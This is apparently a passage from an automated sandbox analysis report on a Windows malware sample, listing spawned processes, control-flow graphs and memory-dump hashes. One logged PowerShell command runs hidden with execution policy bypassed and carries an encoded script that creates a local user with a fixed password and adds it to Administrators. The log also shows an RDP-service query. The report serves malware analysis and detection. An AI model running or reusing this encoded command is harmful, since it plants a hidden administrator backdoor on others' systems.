cAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:25
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:26
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:27
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:sc query myRdpService
                                                                                                                            Imagebase:0x7ff683870000
                                                                                                                            File size:72'192 bytes
                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:28
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:29
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 13247 7ff848f58824 13248 7ff848f5882d LoadLibraryExW 13247->13248 13250 7ff848f588dd 13248->13250

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 324 7ff848f492d6-7ff848f492e3 325 7ff848f492ee-7ff848f493b7 324->325 326 7ff848f492e5-7ff848f492ed 324->326 330 7ff848f493b9-7ff848f493c2 325->330 331 7ff848f49423 325->331 326->325 330->331 333 7ff848f493c4-7ff848f493d0 330->333 332 7ff848f49425-7ff848f4944a 331->332 339 7ff848f4944c-7ff848f49455 332->339 340 7ff848f494b6 332->340 334 7ff848f49409-7ff848f49421 333->334 335 7ff848f493d2-7ff848f493e4 333->335 334->332 337 7ff848f493e8-7ff848f493fb 335->337 338 7ff848f493e6 335->338 337->337 341 7ff848f493fd-7ff848f49405 337->341 338->337 339->340 342 7ff848f49457-7ff848f49463 339->342 343 7ff848f494b8-7ff848f49560 340->343 341->334 344 7ff848f4949c-7ff848f494b4 342->344 345 7ff848f49465-7ff848f49477 342->345 354 7ff848f495ce 343->354 355 7ff848f49562-7ff848f4956c 343->355 344->343 346 7ff848f49479 345->346 347 7ff848f4947b-7ff848f4948e 345->347 346->347 347->347 349 7ff848f49490-7ff848f49498 347->349 349->344 357 7ff848f495d0-7ff848f495f9 354->357 355->354 356 7ff848f4956e-7ff848f4957b 355->356 358 7ff848f4957d-7ff848f4958f 356->358 359 7ff848f495b4-7ff848f495cc 356->359 363 7ff848f495fb-7ff848f49606 357->363 364 7ff848f49663 357->364 360 7ff848f49591 358->360 361 7ff848f49593-7ff848f495a6 358->361 359->357 360->361 361->361 365 7ff848f495a8-7ff848f495b0 361->365 363->364 366 7ff848f49608-7ff848f49616 363->366 367 7ff848f49665-7ff848f4970b 364->367 365->359 368 7ff848f4964f-7ff848f49661 366->368 369 7ff848f49618-7ff848f4962a 366->369 376 7ff848f4970d 367->376 377 7ff848f49713-7ff848f4974d call 7ff848f49794 367->377 368->367 370 7ff848f4962c 369->370 371 7ff848f4962e-7ff848f49641 369->371 370->371 371->371 373 7ff848f49643-7ff848f4964b 371->373 373->368 376->377 383 7ff848f49752-7ff848f49778 377->383 384 7ff848f4977f-7ff848f49793 383->384 385 7ff848f4977a 383->385 385->384
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4060164e0744cc02e5e0f688e7748d063cca386c665eb65b820f2364248717a4
                                                                                                                              • Instruction ID: f2c755c0c6483ce0d74240ebe2d957b0c438300075c48eb42812057c26370fea
                                                                                                                              • Opcode Fuzzy Hash: 4060164e0744cc02e5e0f688e7748d063cca386c665eb65b820f2364248717a4
                                                                                                                              • Instruction Fuzzy Hash: 1AF1B530A1CA8D8FEBA9EF28C8557E937D1FF64750F04426ED84DC7691DB3898458B81

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 386 7ff848f4a082-7ff848f4a08f 387 7ff848f4a09a-7ff848f4a167 386->387 388 7ff848f4a091-7ff848f4a099 386->388 392 7ff848f4a169-7ff848f4a172 387->392 393 7ff848f4a1d3 387->393 388->387 392->393 395 7ff848f4a174-7ff848f4a180 392->395 394 7ff848f4a1d5-7ff848f4a1fa 393->394 402 7ff848f4a1fc-7ff848f4a205 394->402 403 7ff848f4a266 394->403 396 7ff848f4a1b9-7ff848f4a1d1 395->396 397 7ff848f4a182-7ff848f4a194 395->397 396->394 398 7ff848f4a198-7ff848f4a1ab 397->398 399 7ff848f4a196 397->399 398->398 401 7ff848f4a1ad-7ff848f4a1b5 398->401 399->398 401->396 402->403 405 7ff848f4a207-7ff848f4a213 402->405 404 7ff848f4a268-7ff848f4a28d 403->404 411 7ff848f4a28f-7ff848f4a299 404->411 412 7ff848f4a2fb 404->412 406 7ff848f4a24c-7ff848f4a264 405->406 407 7ff848f4a215-7ff848f4a227 405->407 406->404 409 7ff848f4a229 407->409 410 7ff848f4a22b-7ff848f4a23e 407->410 409->410 410->410 413 7ff848f4a240-7ff848f4a248 410->413 411->412 414 7ff848f4a29b-7ff848f4a2a8 411->414 415 7ff848f4a2fd-7ff848f4a32b 412->415 413->406 416 7ff848f4a2aa-7ff848f4a2bc 414->416 417 7ff848f4a2e1-7ff848f4a2f9 414->417 422 7ff848f4a32d-7ff848f4a338 415->422 423 7ff848f4a39b 415->423 418 7ff848f4a2be 416->418 419 7ff848f4a2c0-7ff848f4a2d3 416->419 417->415 418->419 419->419 421 7ff848f4a2d5-7ff848f4a2dd 419->421 421->417 422->423 425 7ff848f4a33a-7ff848f4a348 422->425 424 7ff848f4a39d-7ff848f4a48a 423->424 436 7ff848f4a48c 424->436 437 7ff848f4a492-7ff848f4a4ac 424->437 426 7ff848f4a34a-7ff848f4a35c 425->426 427 7ff848f4a381-7ff848f4a399 425->427 428 7ff848f4a35e 426->428 429 7ff848f4a360-7ff848f4a373 426->429 427->424 428->429 429->429 431 7ff848f4a375-7ff848f4a37d 429->431 431->427 436->437 440 7ff848f4a4b5-7ff848f4a4f4 call 7ff848f4a510 437->440 444 7ff848f4a4fb-7ff848f4a50f 440->444 445 7ff848f4a4f6 440->445 445->444
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e25847ca684a7e9c6d96f72292d143da1fed3defddf5c1c996ee239b56c754e8
                                                                                                                              • Instruction ID: 4c66f874052af49a509cc3878edf5118bd4ce50f506405169fc7c58da032f187
                                                                                                                              • Opcode Fuzzy Hash: e25847ca684a7e9c6d96f72292d143da1fed3defddf5c1c996ee239b56c754e8
                                                                                                                              • Instruction Fuzzy Hash: 47E1A33090CA8D8FEBA8EF28C8557E977D1FF64750F04426ED84DC7291DB78A9848B81

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 107 7ff848f58824-7ff848f5882b 108 7ff848f5882d-7ff848f58835 107->108 109 7ff848f58836-7ff848f5889f 107->109 108->109 112 7ff848f588a9-7ff848f588db LoadLibraryExW 109->112 113 7ff848f588a1-7ff848f588a6 109->113 114 7ff848f588dd 112->114 115 7ff848f588e3-7ff848f5890a 112->115 113->112 114->115
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              • Opcode ID: a21e60f3ed5871aad325422d2d1b3675515159dbc6450e4fe134d484f15d884f
                                                                                                                              • Instruction ID: e6eb1875a8b42ad170c9aca081f76d35c1d0129828dc1d6262f37b75431bfe62
                                                                                                                              • Opcode Fuzzy Hash: a21e60f3ed5871aad325422d2d1b3675515159dbc6450e4fe134d484f15d884f
                                                                                                                              • Instruction Fuzzy Hash: FA31D23190CA5C8FDB59DBA88845AEABBE1FF55321F14422BD049D3192CB74A845CB91

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 120 7ff84901ae81-7ff84901ae8d 121 7ff84901ae8f-7ff84901ae9b 120->121 122 7ff84901ae9d-7ff84901aea3 121->122 123 7ff84901aea6-7ff84901af17 121->123 122->123 132 7ff84901af1d-7ff84901af66 123->132 133 7ff84901b567-7ff84901b57c 123->133 138 7ff84901af68-7ff84901afa5 132->138 139 7ff84901afac-7ff84901afbb 132->139 138->139 140 7ff84901afbd-7ff84901afca 139->140 141 7ff84901afa7 139->141 144 7ff84901afcc-7ff84901afe1 140->144 145 7ff84901afe3-7ff84901afee 140->145 141->139 144->145 145->141 147 7ff84901aff0-7ff84901affd 145->147 149 7ff84901afff-7ff84901b00c 147->149 150 7ff84901b016-7ff84901b021 147->150 149->150 154 7ff84901b00e-7ff84901b014 149->154 150->141 152 7ff84901b023-7ff84901b02d 150->152 156 7ff84901b02f-7ff84901b03d 152->156 157 7ff84901b047-7ff84901b04b 152->157 154->150 156->157 161 7ff84901b03f-7ff84901b045 156->161 157->141 159 7ff84901b051-7ff84901b05b 157->159 162 7ff84901b05d-7ff84901b06a 159->162 163 7ff84901b074-7ff84901b096 159->163 161->157 162->163 168 7ff84901b06c-7ff84901b072 162->168 170 7ff84901b09d-7ff84901b0a5 163->170 168->163 171 7ff84901b0ac-7ff84901b0bb 170->171 171->141 172 7ff84901b0c1-7ff84901b0cb 171->172 173 7ff84901b0cd-7ff84901b0db 172->173 174 7ff84901b0e5-7ff84901b0f1 172->174 173->174 179 7ff84901b0dd-7ff84901b0e3 173->179 174->141 175 7ff84901b0f7-7ff84901b101 174->175 177 7ff84901b11b-7ff84901b18c 175->177 178 7ff84901b103-7ff84901b114 175->178 177->141 188 7ff84901b192-7ff84901b19f 177->188 178->177 179->174 189 7ff84901b1b8-7ff84901b1c8 188->189 190 7ff84901b1a1-7ff84901b1b6 188->190 189->141 192 7ff84901b1ce-7ff84901b1d8 189->192 190->189 193 7ff84901b1da-7ff84901b1e7 192->193 194 7ff84901b1f1-7ff84901b1fd 192->194 193->194 198 7ff84901b1e9-7ff84901b1ef 193->198 194->141 197 7ff84901b203-7ff84901b20d 194->197 199 7ff84901b20f-7ff84901b224 197->199 200 7ff84901b226-7ff84901b26d 197->200 198->194 199->200 200->141 208 7ff84901b273-7ff84901b27d 200->208 209 7ff84901b27f-7ff84901b294 208->209 210 7ff84901b296-7ff84901b2a2 208->210 209->210 210->141 212 7ff84901b2a8-7ff84901b2b2 210->212 213 7ff84901b2d2-7ff84901b2d3 212->213 214 7ff84901b2b4-7ff84901b2d0 212->214 215 7ff84901b2d4 213->215 214->213 218 7ff84901b324 215->218 219 7ff84901b2d6-7ff84901b323 215->219 222 7ff84901b374-7ff84901b3a3 218->222 223 7ff84901b326-7ff84901b330 218->223 219->218 235 7ff84901b3ab-7ff84901b3b7 222->235 223->215 227 7ff84901b332-7ff84901b36c 223->227 227->235 236 7ff84901b36e-7ff84901b36f 227->236 238 7ff84901b3bd-7ff84901b3c7 235->238 239 7ff84901b591-7ff84901b5bc 235->239 236->222 240 7ff84901b3c9-7ff84901b3e4 238->240 241 7ff84901b3e6-7ff84901b3f2 238->241 252 7ff84901b5bd-7ff84901b62d 239->252 240->241 241->239 242 7ff84901b3f8-7ff84901b402 241->242 245 7ff84901b421-7ff84901b468 242->245 246 7ff84901b404-7ff84901b41f 242->246 245->239 259 7ff84901b46e-7ff84901b478 245->259 246->245 260 7ff84901b47a-7ff84901b495 259->260 261 7ff84901b497-7ff84901b4a3 259->261 260->261 261->239 264 7ff84901b4a9-7ff84901b4b6 261->264 265 7ff84901b4b8-7ff84901b4d3 264->265 266 7ff84901b4d5-7ff84901b53b 264->266 265->266 277 7ff84901ac79-7ff84901ac85 266->277 278 7ff84901b541-7ff84901b54c 266->278 277->239 279 7ff84901ac8b-7ff84901ac98 277->279 278->252 283 7ff84901b54e-7ff84901b555 278->283 281 7ff84901ac9a-7ff84901aca7 279->281 282 7ff84901acb1-7ff84901accb 279->282 281->282 288 7ff84901aca9-7ff84901acaf 281->288 285 7ff84901ad0a-7ff84901ad16 282->285 286 7ff84901accc-7ff84901ad02 282->286 283->277 285->239 287 7ff84901ad1c-7ff84901ad29 285->287 286->285 290 7ff84901ad2b-7ff84901ad3b 287->290 291 7ff84901ad42-7ff84901ad52 287->291 288->282 290->286 296 7ff84901ad3d-7ff84901ad40 290->296 291->239 294 7ff84901ad58-7ff84901ad62 291->294 297 7ff84901ad7b-7ff84901ad87 294->297 298 7ff84901ad64-7ff84901ad79 294->298 296->291 297->239 301 7ff84901ad8d-7ff84901ad97 297->301 298->297 302 7ff84901ad99-7ff84901ada7 301->302 303 7ff84901adb1-7ff84901adf8 301->303 302->303 308 7ff84901ada9-7ff84901adaf 302->308 303->239 312 7ff84901adfe-7ff84901ae0b 303->312 308->303 313 7ff84901ae0d-7ff84901ae1b 312->313 314 7ff84901ae25-7ff84901ae36 312->314 313->314 319 7ff84901ae1d-7ff84901ae23 313->319 314->239 315 7ff84901ae3c-7ff84901ae46 314->315 317 7ff84901ae48-7ff84901ae61 315->317 318 7ff84901ae64-7ff84901ae70 315->318 317->318 318->239 321 7ff84901ae76-7ff84901ae80 318->321 319->314 321->120 322 7ff84901b55a-7ff84901b562 321->322 322->123
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2474606961.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cb2149f58630c792ce6d0a036849823de3511637609dc25a0cc1c18e1d7e9c19
                                                                                                                              • Instruction ID: 060374a975c13a9068fe5389526e9dec19797008a2ec43135a8ac8085064cffd
                                                                                                                              • Opcode Fuzzy Hash: cb2149f58630c792ce6d0a036849823de3511637609dc25a0cc1c18e1d7e9c19
                                                                                                                              • Instruction Fuzzy Hash: 8672AD30E0DA898FEBA9EB28885667477E1FF55344F5801BDD00DC7296EE2AEC46C741

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 498 7ff849011f5c-7ff849011fd7 502 7ff849011fdd-7ff849011fe7 498->502 503 7ff84901212f-7ff849012189 498->503 504 7ff849011fe9-7ff849012001 502->504 505 7ff849012003-7ff849012010 502->505 523 7ff84901218b-7ff8490121b2 503->523 524 7ff8490121b4-7ff8490121e1 503->524 504->505 511 7ff8490120d0-7ff8490120da 505->511 512 7ff849012016-7ff849012019 505->512 516 7ff8490120e9-7ff84901212c 511->516 517 7ff8490120dc-7ff8490120e8 511->517 512->511 514 7ff84901201f-7ff849012027 512->514 514->503 518 7ff84901202d-7ff849012037 514->518 516->503 521 7ff849012039-7ff84901204e 518->521 522 7ff849012050-7ff849012054 518->522 521->522 522->511 526 7ff849012056-7ff849012059 522->526 523->524 540 7ff8490121e3 524->540 541 7ff8490121e4-7ff8490121f5 524->541 530 7ff84901205b-7ff849012064 526->530 531 7ff849012070-7ff849012074 526->531 530->531 531->511 536 7ff849012076-7ff84901207c 531->536 538 7ff84901209b 536->538 539 7ff84901207e-7ff849012091 536->539 546 7ff8490120a0-7ff8490120a9 538->546 547 7ff849012098-7ff849012099 539->547 540->541 544 7ff8490121f8-7ff84901220a 541->544 545 7ff8490121f7 541->545 545->544 548 7ff8490120ab-7ff8490120b8 546->548 549 7ff8490120c2-7ff8490120cf 546->549 547->538 548->549 551 7ff8490120ba-7ff8490120c0 548->551 551->549
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2474606961.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 238d0641eeda387d2f68c763557c691a8023ef0554f4ac8e54647d346925c247
                                                                                                                              • Instruction ID: ae306fd825e28a4efeeebad9774d32111ea9f118f3f21b681268682b0775f144
                                                                                                                              • Opcode Fuzzy Hash: 238d0641eeda387d2f68c763557c691a8023ef0554f4ac8e54647d346925c247
                                                                                                                              • Instruction Fuzzy Hash: 50910631A0EAC98FEBAAEB2C18256B57BE1EF56350B1802FBD04DC7193E919DC45C351

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2492073025.00007FF8496C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8496c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 70eafa7ff408b72172b1300acdfe1b3c07cb45a9bd10a64d606147ca4cf17497
                                                                                                                              • Instruction ID: 1adfa642b93cf4cd6512f31f4e71de8f3442723427572b1a01dac32e9da4b0b3
                                                                                                                              • Opcode Fuzzy Hash: 70eafa7ff408b72172b1300acdfe1b3c07cb45a9bd10a64d606147ca4cf17497
                                                                                                                              • Instruction Fuzzy Hash: EB519051C0E6C65FEB676B781C651B17FA0DF53295B0900FAE08CCB1E3E84C6C5A8362
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2492073025.00007FF8496C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8496c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f0264fd49f52bb83c405e67823f64762ebe053411783109ec9b42a1f76fbed3f
                                                                                                                              • Instruction ID: a86dcd8790b47a23f961432696f68de36c5406c77b99c5b1628faa2198192962
                                                                                                                              • Opcode Fuzzy Hash: f0264fd49f52bb83c405e67823f64762ebe053411783109ec9b42a1f76fbed3f
                                                                                                                              • Instruction Fuzzy Hash: 9D115C5280E6C64FEB676B781CA50A47FA0EF17691B0904EAD0889B0E3E8496C4B8352
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2474606961.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff849010000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: edb1274a2490c4636f68ab2d29a2b3988d4381cc0f864e4202ce43f5d688246f
                                                                                                                              • Instruction ID: 9473a09ac72e36bf1820ba569b517494bc69e93089d410b2b3d38f05e9002ad1
                                                                                                                              • Opcode Fuzzy Hash: edb1274a2490c4636f68ab2d29a2b3988d4381cc0f864e4202ce43f5d688246f
                                                                                                                              • Instruction Fuzzy Hash: 5301D622F1ED5A4EFABAF62C14162B995D2DF946A1F5802BAC50EC35A7ED0DDC108241
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `9/$h9/$p9/$x9/
                                                                                                                              • API String ID: 0-1649134781
                                                                                                                              • Opcode ID: 98e88e8be5bfbfbb735a39a49e46aa5affb6ffaf7bbc22e1951da246b4b5d69e
                                                                                                                              • Instruction ID: 761095b79945d204c9c759c7d1286466c0e95ef7cac474768b2d0b43d28b4afc
                                                                                                                              • Opcode Fuzzy Hash: 98e88e8be5bfbfbb735a39a49e46aa5affb6ffaf7bbc22e1951da246b4b5d69e
                                                                                                                              • Instruction Fuzzy Hash: 9E923C70A0991A8FEB98EB18C8547BA73B2FB98341F5041F9D10DD7292CF39AD818F15
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L
                                                                                                                              • API String ID: 0-2909332022
                                                                                                                              • Opcode ID: 6e4fe65ebec0cd55987e7be81cec16d2dafa0c47a1edb84f3cc3e56e8669e234
                                                                                                                              • Instruction ID: b925a03518a4797ec5bfc012e179669296c8e035d54ad487287925f0e33cf888
                                                                                                                              • Opcode Fuzzy Hash: 6e4fe65ebec0cd55987e7be81cec16d2dafa0c47a1edb84f3cc3e56e8669e234
                                                                                                                              • Instruction Fuzzy Hash: D142E43092DA898FEBA8EF1888157A9B7E0FF55340F14417DD84DCB2D3DB38A9468785
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L
                                                                                                                              • API String ID: 0-2909332022
                                                                                                                              • Opcode ID: 5c8ed288b3689de7619018fcab2b8a03acb7b6b50e3d47f01c0ab1cd12097e2a
                                                                                                                              • Instruction ID: 3ecb0255a968d6af38c7a4bc9848153e400b0005b59604edcc9564429a7140a7
                                                                                                                              • Opcode Fuzzy Hash: 5c8ed288b3689de7619018fcab2b8a03acb7b6b50e3d47f01c0ab1cd12097e2a
                                                                                                                              • Instruction Fuzzy Hash: 6812803092CA4A8FEBA4EF18C845BB9B7E0FF58341F144179D84DC76D2DB38A9468785
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c8bb68785de817d3cda4d7eaaa8354c56564031b10f7e5d67e6a9cca382f6e73
                                                                                                                              • Instruction ID: 3e630e8f6cf973fd64620a141a62ae3eab9c04d0612136fe46b07db103998b1b
                                                                                                                              • Opcode Fuzzy Hash: c8bb68785de817d3cda4d7eaaa8354c56564031b10f7e5d67e6a9cca382f6e73
                                                                                                                              • Instruction Fuzzy Hash: 2DB1D73751F2959ED741BB7CB8510EA7B70EF42279B0843B7D1C8CE093DA1C644A87A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2473677749.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 20fd94e17b07bab3f7feeee6ea2697f70392b81b16a6d1ce0c656cd80388ae2d
                                                                                                                              • Instruction ID: 4613cbffad7a877ae5138a60d2af93b628d1e378c86b4847147d0901dd1d7c82
